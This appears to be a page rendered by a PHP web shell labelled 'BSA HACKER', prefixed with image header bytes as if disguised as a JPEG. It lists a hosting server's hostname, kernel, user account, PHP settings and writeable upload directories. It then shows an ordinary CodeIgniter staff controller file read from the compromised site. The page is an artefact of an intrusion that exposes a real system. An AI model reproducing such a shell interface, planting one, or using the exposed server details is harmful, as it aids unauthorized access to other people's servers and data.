ÿØÿàJFIFHHÿá .
BSA HACKER
Logo of a company Server : Apache
System : Linux nusantara.hosteko.com 4.18.0-553.16.1.lve.el8.x86_64 #1 SMP Tue Aug 13 17:45:03 UTC 2024 x86_64
User : koperas1 ( 1254)
PHP Version : 7.4.33
Disable Function : NONE
Directory :  /home/koperas1/www/app/Controllers/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/koperas1/www/app/Controllers/Staff.php
<?php

namespace App\Controllers;

use App\Models\Kategori_staff_model;
use App\Models\Konfigurasi_model;
use App\Models\Staff_model;

class Staff extends BaseController
{
    // Staff
    public function index()
    {
        $m_konfigurasi = new Konfigurasi_model();
        $m_staff       = new Staff_model();
        $m_kategori    = new Kategori_staff_model();
        $konfigurasi   = $m_konfigurasi->listing();
        $kategori      = $m_kategori->listing();

        $data = ['title'  => 'Staff Kami',
            'description' => 'Staff Kami ' . $konfigurasi['namaweb'] . ', ' . $konfigurasi['tentang'],
            'keywords'    => 'Staff Kami ' . $konfigurasi['namaweb'] . ', ' . $konfigurasi['keywords'],
            'kategori'    => $kategori,
            'm_staff'     => $m_staff,
            'konfigurasi' => $konfigurasi,
            'content'     => 'staff/index',
        ];
        echo view('layout/wrapper', $data);
    }
}